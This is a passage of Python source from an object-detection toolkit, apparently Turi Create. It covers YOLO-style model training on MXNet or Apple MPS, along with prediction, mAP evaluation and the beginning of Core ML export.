batch_size_each = batch_size // max(num_mxnet_gpus, 1)
if use_mps and _mps_device_memory_limit() < 4 * 1024 * 1024 * 1024:
# Reduce batch size for GPUs with less than 4GB RAM
batch_size_each = 16
# Note, this may slightly alter the batch size to fit evenly on the GPUs
batch_size = max(num_mxnet_gpus, 1) * batch_size_each
if verbose:
print("Setting 'batch_size' to {}".format(batch_size))
# The IO thread also handles MXNet-powered data augmentation. This seems
# to be problematic to run independently of a MXNet-powered neural network
# in a separate thread. For this reason, we restrict IO threads to when
# the neural network backend is MPS.
io_thread_buffer_size = params['io_thread_buffer_size'] if use_mps else 0
if verbose:
# Estimate memory usage (based on experiments)
cuda_mem_req = 550 + batch_size_each * 85
_tkutl._print_neural_compute_device(cuda_gpus=cuda_gpus, use_mps=use_mps,
cuda_mem_req=cuda_mem_req)
grid_shape = params['grid_shape']
input_image_shape = (3,
grid_shape[0] * ref_model.spatial_reduction,
grid_shape[1] * ref_model.spatial_reduction)
try:
if is_annotations_list:
instances = (dataset.stack(annotations, new_column_name='_bbox', drop_na=True)
.unpack('_bbox', limit=['label']))
else:
instances = dataset.rename({annotations: '_bbox'}).dropna('_bbox')
instances = instances.unpack('_bbox', limit=['label'])
except (TypeError, RuntimeError):
        # If this fails, the annotation format is invalid at the coarsest level
raise _ToolkitError("Annotations format is invalid. Must be a list of "
"dictionaries or single dictionary containing 'label' and 'coordinates'.")
num_images = len(dataset)
num_instances = len(instances)
if classes is None:
classes = instances['_bbox.label'].unique()
classes = sorted(classes)
# Make a class-to-index look-up table
class_to_index = {name: index for index, name in enumerate(classes)}
num_classes = len(classes)
if max_iterations == 0:
# Set number of iterations through a heuristic
num_iterations_raw = 5000 * _np.sqrt(num_instances) / batch_size
num_iterations = 1000 * max(1, int(round(num_iterations_raw / 1000)))
if verbose:
print("Setting 'max_iterations' to {}".format(num_iterations))
else:
num_iterations = max_iterations
# Create data loader
loader = _SFrameDetectionIter(dataset,
batch_size=batch_size,
input_shape=input_image_shape[1:],
output_shape=grid_shape,
anchors=anchors,
class_to_index=class_to_index,
aug_params=params,
shuffle=params['shuffle'],
loader_type='augmented',
feature_column=feature,
annotations_column=annotations,
io_thread_buffer_size=io_thread_buffer_size,
iterations=num_iterations)
# Predictions per anchor box: x/y + w/h + object confidence + class probs
preds_per_box = 5 + num_classes
output_size = preds_per_box * num_anchors
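    # Example: with 20 classes and the 15 default anchors above, preds_per_box
    # is 25 and output_size is 375 channels coming out of the network.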
ymap_shape = (batch_size_each,) + tuple(grid_shape) + (num_anchors, preds_per_box)
net = _tiny_darknet(output_size=output_size)
loss = _YOLOLoss(input_shape=input_image_shape[1:],
output_shape=grid_shape,
batch_size=batch_size_each,
num_classes=num_classes,
anchors=anchors,
parameters=params)
base_lr = params['learning_rate']
steps = [num_iterations // 2, 3 * num_iterations // 4, num_iterations]
steps_and_factors = [(step, 10**(-i)) for i, step in enumerate(steps)]
steps, factors = zip(*steps_and_factors)
lr_scheduler = _ManualScheduler(step=steps, factor=factors)
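    # In other words, the learning rate starts at base_lr, drops to base_lr/10
    # halfway through training and to base_lr/100 at the three-quarter mark.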
ctx = _mxnet_utils.get_mxnet_context(max_devices=batch_size)
net_params = net.collect_params()
net_params.initialize(_mx.init.Xavier(), ctx=ctx)
net_params['conv7_weight'].initialize(_mx.init.Xavier(factor_type='avg'), ctx=ctx, force_reinit=True)
net_params['conv8_weight'].initialize(_mx.init.Uniform(0.00005), ctx=ctx, force_reinit=True)
# Initialize object confidence low, preventing an unnecessary adjustment
# period toward conservative estimates
bias = _np.zeros(output_size, dtype=_np.float32)
bias[4::preds_per_box] -= 6
from ._mx_detector import ConstantArray
net_params['conv8_bias'].initialize(ConstantArray(bias), ctx, force_reinit=True)
# Take a subset and then load the rest of the parameters. It is possible to
# do allow_missing=True directly on net_params. However, this will more
# easily hide bugs caused by names getting out of sync.
ref_model.available_parameters_subset(net_params).load(ref_model.model_path, ctx)
column_names = ['Iteration', 'Loss', 'Elapsed Time']
num_columns = len(column_names)
column_width = max(map(lambda x: len(x), column_names)) + 2
hr = '+' + '+'.join(['-' * column_width] * num_columns) + '+'
progress = {'smoothed_loss': None, 'last_time': 0}
iteration = 0
def update_progress(cur_loss, iteration):
iteration_base1 = iteration + 1
if progress['smoothed_loss'] is None:
progress['smoothed_loss'] = cur_loss
else:
progress['smoothed_loss'] = 0.9 * progress['smoothed_loss'] + 0.1 * cur_loss
cur_time = _time.time()
# Printing of table header is deferred, so that start-of-training
# warnings appear above the table
if verbose and iteration == 0:
# Print progress table header
print(hr)
print(('| {:<{width}}' * num_columns + '|').format(*column_names, width=column_width-1))
print(hr)
if verbose and (cur_time > progress['last_time'] + 10 or
iteration_base1 == max_iterations):
# Print progress table row
elapsed_time = cur_time - start_time
print("| {cur_iter:<{width}}| {loss:<{width}.3f}| {time:<{width}.1f}|".format(
cur_iter=iteration_base1, loss=progress['smoothed_loss'],
time=elapsed_time , width=column_width-1))
progress['last_time'] = cur_time
if use_mps:
# Force initialization of net_params
# TODO: Do not rely on MXNet to initialize MPS-based network
net.forward(_mx.nd.uniform(0, 1, (batch_size_each,) + input_image_shape))
mps_net_params = {}
keys = list(net_params)
for k in keys:
mps_net_params[k] = net_params[k].data().asnumpy()
# Multiplies the loss to move the fp16 gradients away from subnormals
# and gradual underflow. The learning rate is correspondingly divided
# by the same multiple to make training mathematically equivalent. The
# update is done in fp32, which is why this trick works. Does not
# affect how loss is presented to the user.
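        # For example, with the default mps_loss_mult of 8 the loss (and its
        # fp16 gradients) are 8x larger, while the learning rate handed to MPS
        # is base_lr / 8, so the fp32 weight update is numerically unchanged.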
mps_loss_mult = params['mps_loss_mult']
mps_config = {
'mode': _MpsGraphMode.Train,
'use_sgd': True,
'learning_rate': base_lr / params['mps_loss_mult'],
'gradient_clipping': params.get('clip_gradients', 0.0) * mps_loss_mult,
'weight_decay': params['weight_decay'],
'od_include_network': True,
'od_include_loss': True,
'od_scale_xy': params['lmb_coord_xy'] * mps_loss_mult,
'od_scale_wh': params['lmb_coord_wh'] * mps_loss_mult,
'od_scale_no_object': params['lmb_noobj'] * mps_loss_mult,
'od_scale_object': params['lmb_obj'] * mps_loss_mult,
'od_scale_class': params['lmb_class'] * mps_loss_mult,
'od_max_iou_for_no_object': 0.3,
'od_min_iou_for_object': 0.7,
'od_rescore': params['rescore'],
}
mps_net = _get_mps_od_net(input_image_shape=input_image_shape,
batch_size=batch_size,
output_size=output_size,
anchors=anchors,
config=mps_config,
weights=mps_net_params)
# Use worker threads to isolate different points of synchronization
# and/or waiting for non-Python tasks to finish. The
# sframe_worker_thread will spend most of its time waiting for SFrame
# operations, largely image I/O and decoding, along with scheduling
# MXNet data augmentation. The numpy_worker_thread will spend most of
# its time waiting for MXNet data augmentation to complete, along with
# copying the results into NumPy arrays. Finally, the main thread will
# spend most of its time copying NumPy data into MPS and waiting for the
# results. Note that using three threads here only makes sense because
# each thread spends time waiting for non-Python code to finish (so that
# no thread hogs the global interpreter lock).
mxnet_batch_queue = _Queue(1)
numpy_batch_queue = _Queue(1)
def sframe_worker():
# Once a batch is loaded into NumPy, pass it immediately to the
# numpy_worker so that we can start I/O and decoding for the next
# batch.
for batch in loader:
mxnet_batch_queue.put(batch)
mxnet_batch_queue.put(None)
def numpy_worker():
while True:
batch = mxnet_batch_queue.get()
if batch is None:
break
for x, y in zip(batch.data, batch.label):
# Convert to NumPy arrays with required shapes. Note that
# asnumpy waits for any pending MXNet operations to finish.
input_data = _mxnet_to_mps(x.asnumpy())
label_data = y.asnumpy().reshape(y.shape[:-2] + (-1,))
# Convert to packed 32-bit arrays.
input_data = input_data.astype(_np.float32)
if not input_data.flags.c_contiguous:
input_data = input_data.copy()
label_data = label_data.astype(_np.float32)
if not label_data.flags.c_contiguous:
label_data = label_data.copy()
# Push this batch to the main thread.
numpy_batch_queue.put({'input' : input_data,
'label' : label_data,
'iteration' : batch.iteration})
# Tell the main thread there's no more data.
numpy_batch_queue.put(None)
sframe_worker_thread = _Thread(target=sframe_worker)
sframe_worker_thread.start()
numpy_worker_thread = _Thread(target=numpy_worker)
numpy_worker_thread.start()
batch_queue = []
def wait_for_batch():
pending_loss = batch_queue.pop(0)
batch_loss = pending_loss.asnumpy() # Waits for the batch to finish
return batch_loss.sum() / mps_loss_mult
while True:
batch = numpy_batch_queue.get()
if batch is None:
break
# Adjust learning rate according to our schedule.
if batch['iteration'] in steps:
ii = steps.index(batch['iteration']) + 1
new_lr = factors[ii] * base_lr
mps_net.set_learning_rate(new_lr / mps_loss_mult)
            # Submit this batch to MPS.
batch_queue.append(mps_net.train(batch['input'], batch['label']))
# If we have two batches in flight, wait for the first one.
if len(batch_queue) > 1:
cur_loss = wait_for_batch()
# If we just submitted the first batch of an iteration, update
# progress for the iteration completed by the last batch we just
# waited for.
if batch['iteration'] > iteration:
update_progress(cur_loss, iteration)
iteration = batch['iteration']
# Wait for any pending batches and finalize our progress updates.
while len(batch_queue) > 0:
cur_loss = wait_for_batch()
update_progress(cur_loss, iteration)
sframe_worker_thread.join()
numpy_worker_thread.join()
# Load back into mxnet
mps_net_params = mps_net.export()
keys = mps_net_params.keys()
for k in keys:
if k in net_params:
net_params[k].set_data(mps_net_params[k])
else: # Use MxNet
net.hybridize()
options = {'learning_rate': base_lr, 'lr_scheduler': lr_scheduler,
'momentum': params['sgd_momentum'], 'wd': params['weight_decay'], 'rescale_grad': 1.0}
clip_grad = params.get('clip_gradients')
if clip_grad:
options['clip_gradient'] = clip_grad
trainer = _mx.gluon.Trainer(net.collect_params(), 'sgd', options)
for batch in loader:
data = _mx.gluon.utils.split_and_load(batch.data[0], ctx_list=ctx, batch_axis=0)
label = _mx.gluon.utils.split_and_load(batch.label[0], ctx_list=ctx, batch_axis=0)
Ls = []
Zs = []
with _mx.autograd.record():
for x, y in zip(data, label):
z = net(x)
z0 = _mx.nd.transpose(z, [0, 2, 3, 1]).reshape(ymap_shape)
L = loss(z0, y)
Ls.append(L)
for L in Ls:
L.backward()
trainer.step(1)
cur_loss = _np.mean([L.asnumpy()[0] for L in Ls])
update_progress(cur_loss, batch.iteration)
iteration = batch.iteration
training_time = _time.time() - start_time
if verbose:
print(hr) # progress table footer
# Save the model
training_iterations = iteration + 1
state = {
'_model': net,
'_class_to_index': class_to_index,
'_training_time_as_string': _seconds_as_string(training_time),
'_grid_shape': grid_shape,
'anchors': anchors,
'model': model,
'classes': classes,
'batch_size': batch_size,
'input_image_shape': input_image_shape,
'feature': feature,
'non_maximum_suppression_threshold': params['non_maximum_suppression_threshold'],
'annotations': annotations,
'num_classes': num_classes,
'num_examples': num_images,
'num_bounding_boxes': num_instances,
'training_time': training_time,
'training_epochs': training_iterations * batch_size // num_images,
'training_iterations': training_iterations,
'max_iterations': max_iterations,
'training_loss': progress['smoothed_loss'],
}
return ObjectDetector(state)
class ObjectDetector(_CustomModel):
"""
    A trained model that is ready to use for classification, exported to
Core ML, or for feature extraction.
This model should not be constructed directly.
"""
_PYTHON_OBJECT_DETECTOR_VERSION = 1
def __init__(self, state):
self.__proxy__ = _PythonProxy(state)
@classmethod
def _native_name(cls):
return "object_detector"
def _get_native_state(self):
from .._mxnet import _mxnet_utils
state = self.__proxy__.get_state()
mxnet_params = state['_model'].collect_params()
state['_model'] = _mxnet_utils.get_gluon_net_params_state(mxnet_params)
return state
def _get_version(self):
return self._PYTHON_OBJECT_DETECTOR_VERSION
@classmethod
def _load_version(cls, state, version):
_tkutl._model_version_check(version, cls._PYTHON_OBJECT_DETECTOR_VERSION)
from ._model import tiny_darknet as _tiny_darknet
from .._mxnet import _mxnet_utils
num_anchors = len(state['anchors'])
num_classes = state['num_classes']
output_size = (num_classes + 5) * num_anchors
net = _tiny_darknet(output_size=output_size)
ctx = _mxnet_utils.get_mxnet_context(max_devices=state['batch_size'])
net_params = net.collect_params()
_mxnet_utils.load_net_params_from_state(net_params, state['_model'], ctx=ctx)
state['_model'] = net
state['input_image_shape'] = tuple([int(i) for i in state['input_image_shape']])
state['_grid_shape'] = tuple([int(i) for i in state['_grid_shape']])
return ObjectDetector(state)
def __str__(self):
"""
Return a string description of the model to the ``print`` method.
Returns
-------
out : string
A description of the ObjectDetector.
"""
return self.__repr__()
def __repr__(self):
"""
Print a string description of the model when the model name is entered
in the terminal.
"""
width = 40
sections, section_titles = self._get_summary_struct()
out = _tkutl._toolkit_repr_print(self, sections, section_titles,
width=width)
return out
def _get_summary_struct(self):
"""
Returns a structured description of the model, including (where
relevant) the schema of the training data, description of the training
data, training statistics, and model hyperparameters.
Returns
-------
sections : list (of list of tuples)
A list of summary sections.
Each section is a list.
Each item in a section list is a tuple of the form:
('<label>','<field>')
section_titles: list
A list of section titles.
The order matches that of the 'sections' object.
"""
model_fields = [
('Model', 'model'),
('Number of classes', 'num_classes'),
('Non-maximum suppression threshold', 'non_maximum_suppression_threshold'),
('Input image shape', 'input_image_shape'),
]
training_fields = [
('Training time', '_training_time_as_string'),
('Training epochs', 'training_epochs'),
('Training iterations', 'training_iterations'),
('Number of examples (images)', 'num_examples'),
('Number of bounding boxes (instances)', 'num_bounding_boxes'),
('Final loss (specific to model)', 'training_loss'),
]
section_titles = ['Schema', 'Training summary']
return([model_fields, training_fields], section_titles)
def _predict_with_options(self, dataset, with_ground_truth,
postprocess=True, confidence_threshold=0.001,
iou_threshold=None,
verbose=True):
"""
Predict with options for what kind of SFrame should be returned.
If postprocess is False, a single numpy array with raw unprocessed
results will be returned.
"""
if iou_threshold is None: iou_threshold = self.non_maximum_suppression_threshold
_raise_error_if_not_detection_sframe(dataset, self.feature, self.annotations,
require_annotations=with_ground_truth)
from ._sframe_loader import SFrameDetectionIter as _SFrameDetectionIter
from ._detection import (yolo_map_to_bounding_boxes as _yolo_map_to_bounding_boxes,
non_maximum_suppression as _non_maximum_suppression,
bbox_to_ybox as _bbox_to_ybox)
from .._mxnet import _mxnet_utils
import mxnet as _mx
loader = _SFrameDetectionIter(dataset,
batch_size=self.batch_size,
input_shape=self.input_image_shape[1:],
output_shape=self._grid_shape,
anchors=self.anchors,
class_to_index=self._class_to_index,
loader_type='stretched',
load_labels=with_ground_truth,
shuffle=False,
epochs=1,
feature_column=self.feature,
annotations_column=self.annotations)
num_anchors = len(self.anchors)
preds_per_box = 5 + len(self.classes)
output_size = preds_per_box * num_anchors
# If prediction is done with ground truth, two sframes of the same
# structure are returned, the second one containing ground truth labels
num_returns = 2 if with_ground_truth else 1
sf_builders = [
_tc.SFrameBuilder([int, str, float, float, float, float, float],
column_names=['row_id', 'label', 'confidence',
'x', 'y', 'width', 'height'])
for _ in range(num_returns)
]
num_mxnet_gpus = _mxnet_utils.get_num_gpus_in_use(max_devices=self.batch_size)
use_mps = _use_mps() and num_mxnet_gpus == 0
if use_mps:
if not hasattr(self, '_mps_inference_net') or self._mps_inference_net is None:
mxnet_params = self._model.collect_params()
mps_net_params = { k : mxnet_params[k].data().asnumpy()
for k in mxnet_params }
mps_config = {
'mode': _MpsGraphMode.Inference,
'od_include_network': True,
'od_include_loss': False,
}
mps_net = _get_mps_od_net(input_image_shape=self.input_image_shape,
batch_size=self.batch_size,
output_size=output_size,
anchors=self.anchors,
config=mps_config,
weights=mps_net_params)
self._mps_inference_net = mps_net
dataset_size = len(dataset)
ctx = _mxnet_utils.get_mxnet_context()
done = False
last_time = 0
raw_results = []
for batch in loader:
if batch.pad is not None:
size = self.batch_size - batch.pad
b_data = _mx.nd.slice_axis(batch.data[0], axis=0, begin=0, end=size)
b_indices = _mx.nd.slice_axis(batch.label[1], axis=0, begin=0, end=size)
b_oshapes = _mx.nd.slice_axis(batch.label[2], axis=0, begin=0, end=size)
else:
b_data = batch.data[0]
b_indices = batch.label[1]
b_oshapes = batch.label[2]
size = self.batch_size
if b_data.shape[0] < len(ctx):
ctx0 = ctx[:b_data.shape[0]]
else:
ctx0 = ctx
split_data = _mx.gluon.utils.split_and_load(b_data, ctx_list=ctx0, even_split=False)
split_indices = _mx.gluon.utils.split_data(b_indices, num_slice=len(ctx0), even_split=False)
split_oshapes = _mx.gluon.utils.split_data(b_oshapes, num_slice=len(ctx0), even_split=False)
for data, indices, oshapes in zip(split_data, split_indices, split_oshapes):
if use_mps:
mps_data = _mxnet_to_mps(data.asnumpy())
n_samples = mps_data.shape[0]
if mps_data.shape[0] != self.batch_size:
mps_data_padded = _np.zeros((self.batch_size,) + mps_data.shape[1:],
dtype=mps_data.dtype)
mps_data_padded[:mps_data.shape[0]] = mps_data
mps_data = mps_data_padded
mps_float_array = self._mps_inference_net.predict(mps_data)
mps_z = mps_float_array.asnumpy()[:n_samples]
z = _mps_to_mxnet(mps_z)
else:
z = self._model(data).asnumpy()
if not postprocess:
raw_results.append(z)
continue
ypred = z.transpose(0, 2, 3, 1)
ypred = ypred.reshape(ypred.shape[:-1] + (num_anchors, -1))
zipped = zip(indices.asnumpy(), ypred, oshapes.asnumpy())
for index0, output0, oshape0 in zipped:
index0 = int(index0)
x_boxes, x_classes, x_scores = _yolo_map_to_bounding_boxes(
output0[_np.newaxis], anchors=self.anchors,
confidence_threshold=confidence_threshold,
nms_thresh=None)
x_boxes0 = _np.array(x_boxes).reshape(-1, 4)
# Normalize
x_boxes0[:, 0::2] /= self.input_image_shape[1]
x_boxes0[:, 1::2] /= self.input_image_shape[2]
# Re-shape to original input size
x_boxes0[:, 0::2] *= oshape0[0]
x_boxes0[:, 1::2] *= oshape0[1]
# Clip the boxes to the original sizes
x_boxes0[:, 0::2] = _np.clip(x_boxes0[:, 0::2], 0, oshape0[0])
x_boxes0[:, 1::2] = _np.clip(x_boxes0[:, 1::2], 0, oshape0[1])
# Non-maximum suppression (also limit to 100 detection per
# image, inspired by the evaluation in COCO)
x_boxes0, x_classes, x_scores = _non_maximum_suppression(
x_boxes0, x_classes, x_scores,
num_classes=self.num_classes, threshold=iou_threshold,
limit=100)
for bbox, cls, s in zip(x_boxes0, x_classes, x_scores):
cls = int(cls)
values = [index0, self.classes[cls], s] + list(_bbox_to_ybox(bbox))
sf_builders[0].append(values)
if index0 == len(dataset) - 1:
done = True
cur_time = _time.time()
                    # Do not print progress if only a few samples are predicted
if verbose and (dataset_size >= 5 and cur_time > last_time + 10 or done):
print('Predicting {cur_n:{width}d}/{max_n:{width}d}'.format(
cur_n=index0 + 1, max_n=dataset_size, width=len(str(dataset_size))))
last_time = cur_time
if done:
break
# Ground truth
if with_ground_truth:
zipped = _itertools.islice(zip(batch.label[1].asnumpy(), batch.raw_bboxes, batch.raw_classes), size)
for index0, bbox0, cls0 in zipped:
index0 = int(index0)
for bbox, cls in zip(bbox0, cls0):
cls = int(cls)
if cls == -1:
break
values = [index0, self.classes[cls], 1.0] + list(bbox)
sf_builders[1].append(values)
if index0 == len(dataset) - 1:
break
if postprocess:
ret = tuple([sb.close() for sb in sf_builders])
if len(ret) == 1:
return ret[0]
else:
return ret
else:
return _np.concatenate(raw_results, axis=0)
def _raw_predict(self, dataset):
return self._predict_with_options(dataset, with_ground_truth=False,
postprocess=False)
def _canonize_input(self, dataset):
"""
Takes input and returns tuple of the input in canonical form (SFrame)
along with an unpack callback function that can be applied to
prediction results to "undo" the canonization.
"""
unpack = lambda x: x
if isinstance(dataset, _tc.SArray):
dataset = _tc.SFrame({self.feature: dataset})
elif isinstance(dataset, _tc.Image):
dataset = _tc.SFrame({self.feature: [dataset]})
unpack = lambda x: x[0]
return dataset, unpack
def predict(self, dataset, confidence_threshold=0.25, iou_threshold=None, verbose=True):
"""
Predict object instances in an SFrame of images.
Parameters
----------
dataset : SFrame | SArray | turicreate.Image
The images on which to perform object detection.
If dataset is an SFrame, it must have a column with the same name
as the feature column during training. Additional columns are
ignored.
confidence_threshold : float
Only return predictions above this level of confidence. The
threshold can range from 0 to 1.
iou_threshold : float
Threshold value for non-maximum suppression. Non-maximum suppression
prevents multiple bounding boxes appearing over a single object.
This threshold, set between 0 and 1, controls how aggressive this
            suppression is. A value of 1 means no suppression will
occur, while a value of 0 will maximally suppress neighboring
boxes around a prediction.
verbose : bool
If True, prints prediction progress.
Returns
-------
out : SArray
An SArray with model predictions. Each element corresponds to
an image and contains a list of dictionaries. Each dictionary
            describes an object instance that was found in the image. If
`dataset` is a single image, the return value will be a single
prediction.
See Also
--------
evaluate
Examples
--------
.. sourcecode:: python
# Make predictions
>>> pred = model.predict(data)
# Stack predictions, for a better overview
>>> turicreate.object_detector.util.stack_annotations(pred)
Data:
+--------+------------+-------+-------+-------+-------+--------+
| row_id | confidence | label | x | y | width | height |
+--------+------------+-------+-------+-------+-------+--------+
| 0 | 0.98 | dog | 123.0 | 128.0 | 80.0 | 182.0 |
| 0 | 0.67 | cat | 150.0 | 183.0 | 129.0 | 101.0 |
| 1 | 0.8 | dog | 50.0 | 432.0 | 65.0 | 98.0 |
+--------+------------+-------+-------+-------+-------+--------+
[3 rows x 7 columns]
# Visualize predictions by generating a new column of marked up images
>>> data['image_pred'] = turicreate.object_detector.util.draw_bounding_boxes(data['image'], data['predictions'])
"""
_numeric_param_check_range('confidence_threshold', confidence_threshold, 0.0, 1.0)
dataset, unpack = self._canonize_input(dataset)
stacked_pred = self._predict_with_options(dataset, with_ground_truth=False,
confidence_threshold=confidence_threshold,
iou_threshold=iou_threshold,
verbose=verbose)
from . import util
return unpack(util.unstack_annotations(stacked_pred, num_rows=len(dataset)))
def evaluate(self, dataset, metric='auto',
output_type='dict', iou_threshold=None,
confidence_threshold=None, verbose=True):
"""
Evaluate the model by making predictions and comparing these to ground
truth bounding box annotations.
Parameters
----------
dataset : SFrame
Dataset of new observations. Must include columns with the same
names as the annotations and feature used for model training.
Additional columns are ignored.
metric : str or list, optional
Name of the evaluation metric or list of several names. The primary
metric is average precision, which is the area under the
precision/recall curve and reported as a value between 0 and 1 (1
being perfect). Possible values are:
- 'auto' : Returns all primary metrics.
- 'all' : Returns all available metrics.
- 'average_precision_50' : Average precision per class with
intersection-over-union threshold at
50% (PASCAL VOC metric).
- 'average_precision' : Average precision per class calculated over multiple
intersection-over-union thresholds
(at 50%, 55%, ..., 95%) and averaged.
- 'mean_average_precision_50' : Mean over all classes (for ``'average_precision_50'``).
This is the primary single-value metric.
- 'mean_average_precision' : Mean over all classes (for ``'average_precision'``)
output_type : str
Type of output:
- 'dict' : You are given a dictionary where each key is a metric name and the
value is another dictionary containing class-to-metric entries.
- 'sframe' : All metrics are returned as a single `SFrame`, where each row is a
class and each column is a metric. Metrics that are averaged over
class cannot be returned and are ignored under this format.
However, these are easily computed from the `SFrame` (e.g.
``results['average_precision'].mean()``).
iou_threshold : float
Threshold value for non-maximum suppression. Non-maximum suppression
prevents multiple bounding boxes appearing over a single object.
This threshold, set between 0 and 1, controls how aggressive this
            suppression is. A value of 1 means no suppression will
occur, while a value of 0 will maximally suppress neighboring
boxes around a prediction.
confidence_threshold : float
Only return predictions above this level of confidence. The
threshold can range from 0 to 1.
verbose : bool
If True, prints evaluation progress.
Returns
-------
out : dict / SFrame
Output type depends on the option `output_type`.
See Also
--------
create, predict
Examples
--------
>>> results = model.evaluate(data)
>>> print('mAP: {:.1%}'.format(results['mean_average_precision']))
mAP: 43.2%
"""
if iou_threshold is None: iou_threshold = self.non_maximum_suppression_threshold
if confidence_threshold is None: confidence_threshold = 0.001
AP = 'average_precision'
MAP = 'mean_average_precision'
AP50 = 'average_precision_50'
MAP50 = 'mean_average_precision_50'
ALL_METRICS = {AP, MAP, AP50, MAP50}
if isinstance(metric, (list, tuple, set)):
metrics = metric
elif metric == 'all':
metrics = ALL_METRICS
elif metric == 'auto':
metrics = {AP50, MAP50}
elif metric in ALL_METRICS:
metrics = {metric}
else:
raise _ToolkitError("Metric '{}' not supported".format(metric))
pred, gt = self._predict_with_options(dataset, with_ground_truth=True,
confidence_threshold=confidence_threshold,
iou_threshold=iou_threshold,
verbose=verbose)
pred_df = pred.to_dataframe()
gt_df = gt.to_dataframe()
thresholds = _np.arange(0.5, 1.0, 0.05)
all_th_aps = _average_precision(pred_df, gt_df,
class_to_index=self._class_to_index,
iou_thresholds=thresholds)
def class_dict(aps):
return {classname: aps[index]
for classname, index in self._class_to_index.items()}
if output_type == 'dict':
ret = {}
if AP50 in metrics:
ret[AP50] = class_dict(all_th_aps[0])
if AP in metrics:
ret[AP] = class_dict(all_th_aps.mean(0))
if MAP50 in metrics:
ret[MAP50] = all_th_aps[0].mean()
if MAP in metrics:
ret[MAP] = all_th_aps.mean()
elif output_type == 'sframe':
ret = _tc.SFrame({'label': self.classes})
if AP50 in metrics:
ret[AP50] = all_th_aps[0]
if AP in metrics:
ret[AP] = all_th_aps.mean(0)
else:
raise _ToolkitError("Output type '{}' not supported".format(output_type))
return ret
def _create_coreml_model(self, include_non_maximum_suppression,
iou_threshold, confidence_threshold):
import mxnet as _mx
from .._mxnet._mxnet_to_coreml import _mxnet_converter
import coremltools
from coremltools.models import datatypes, neural_network
if iou_threshold is None: iou_threshold = self.non_maximum_suppression_threshold
if confidence_threshold is None: confidence_threshold = 0.25
preds_per_box = 5 + self.num_classes
num_anchors = len(self.anchors)
num_classes = self.num_classes
batch_size = 1
image_shape = (batch_size,) + tuple(self.input_image_shape)
s_image_uint8 = _mx.sym.Variable(self.feature, shape=image_shape, dtype=_np.float32)
s_image = s_image_uint8 / 255
# Swap a maxpool+slice in mxnet to a coreml natively supported layer
from copy import copy
net = copy(self._model)
net._children = copy(self._model._children)
from ._model import _SpecialDarknetMaxpoolBlock
op = _SpecialDarknetMaxpoolBlock(name='pool5')
# Make sure we are removing the right layers
assert (self._model[23].name == 'pool5' and
self._model[24].name == 'specialcrop5')
del net._children[24]
net._children[23] = op
s_ymap = net(s_image)
mod = _mx.mod.Module(symbol=s_ymap, label_names=None, data_names=[self.feature])
mod.bind(for_training=False, data_shapes=[(self.feature, image_shape)])
# Copy over params from net
mod.init_params()
arg_params, aux_params = mod.get_params()
net_params = net.collect_params()
new_arg_params = {}
for k, param in arg_params.items():
new_arg_params[k] = net_params[k].data(net_params[k].list_ctx()[0])
new_aux_params = {}
for k, param in aux_params.items():
new_aux_params[k] = net_params[k].data(net_params[k].list_ctx()[0])
mod.set_params(new_arg_params, new_aux_params)
input_names = [self.feature]
input_dims = [list(self.input_image_shape)]
input_types = [datatypes.Array(*dim) for dim in input_dims]
input_features = list(zip(input_names, input_types))
num_spatial = self._grid_shape[0] * self._grid_shape[1]
num_bounding_boxes = num_anchors * num_spatial
CONFIDENCE_STR = ("raw_confidence" if include_non_maximum_suppression
else "confidence")
COORDINATES_STR = ("raw_coordinates" if include_non_maximum_suppression
else "coordinates")
output_names = [
CONFIDENCE_STR,
COORDINATES_STR
]
output_dims = [
(num_bounding_boxes, num_classes),
(num_bounding_boxes, 4),
]
output_types = [datatypes.Array(*dim) for dim in output_dims]
output_features = list(zip(output_names, output_types))
mode = None
builder = neural_network.NeuralNetworkBuilder(input_features, output_features, mode)
_mxnet_converter.convert(mod, mode=None,
input_shape=[(self.feature, image_shape)],
builder=builder, verbose=False)
prefix = '__tc__internal__'
# (1, B, C+5, S*S)
builder.add_reshape(name=prefix + 'ymap_sp_pre',
target_shape=[batch_size, num_anchors, preds_per_box, num_spatial],
mode=0,
input_name='conv8_fwd_output',
output_name=prefix + 'ymap_sp_pre')
# (1, C+5, B, S*S)
builder.add_permute(name=prefix + 'ymap_sp',
dim=[0, 2, 1, 3],
input_name=prefix + 'ymap_sp_pre',
output_name=prefix + 'ymap_sp')
# POSITION: X/Y
# (1, 2, B, S*S)
builder.add_slice(name=prefix + 'raw_rel_xy_sp',
axis='channel',
start_index=0,
end_index=2,
stride=1,
input_name=prefix + 'ymap_sp',
output_name=prefix + 'raw_rel_xy_sp')
# (1, 2, B, S*S)
builder.add_activation(name=prefix + 'rel_xy_sp',
non_linearity='SIGMOID',
input_name=prefix + 'raw_rel_xy_sp',
output_name=prefix + 'rel_xy_sp')
# (1, 2, B*H*W, 1)
builder.add_reshape(name=prefix + 'rel_xy',
target_shape=[batch_size, 2, num_bounding_boxes, 1],
mode=0,
input_name=prefix + 'rel_xy_sp',
output_name=prefix + 'rel_xy')
c_xy = _np.array(_np.meshgrid(_np.arange(self._grid_shape[1]),
_np.arange(self._grid_shape[0])), dtype=_np.float32)
c_xy_reshaped = (_np.tile(c_xy[:, _np.newaxis], (num_anchors, 1, 1))
.reshape(2, -1))[_np.newaxis, ..., _np.newaxis]
# (1, 2, B*H*W, 1)
builder.add_load_constant(prefix + 'constant_xy',
constant_value=c_xy_reshaped,
shape=c_xy_reshaped.shape[1:],
output_name=prefix + 'constant_xy')
# (1, 2, B*H*W, 1)
builder.add_elementwise(name=prefix + 'xy',
mode='ADD',
input_names=[prefix + 'constant_xy', prefix + 'rel_xy'],
output_name=prefix + 'xy')
# SHAPE: WIDTH/HEIGHT
# (1, 2, B, S*S)
builder.add_slice(name=prefix + 'raw_rel_wh_sp',
axis='channel',
start_index=2,
end_index=4,
stride=1,
input_name=prefix + 'ymap_sp',
output_name=prefix + 'raw_rel_wh_sp')
# (1, 2, B, S*S)
builder.add_unary(name=prefix + 'rel_wh_sp',
mode='exp',
input_name=prefix + 'raw_rel_wh_sp',
output_name=prefix + 'rel_wh_sp')
# (1, 2*B, S, S)
builder.add_reshape(name=prefix + 'rel_wh',
target_shape=[batch_size, 2 * num_anchors] + list(self._grid_shape),
mode=0,
input_name=prefix + 'rel_wh_sp',
output_name=prefix + 'rel_wh')
np_anchors = _np.asarray(self.anchors, dtype=_np.float32).T
anchors_0 = _np.tile(np_anchors.reshape([2 * num_anchors, 1, 1]), self._grid_shape)
# (1, 2*B, S, S)
builder.add_load_constant(name=prefix + 'c_anchors',
constant_value=anchors_0,
shape=anchors_0.shape,
output_name=prefix + 'c_anchors')
# (1, 2*B, S, S)
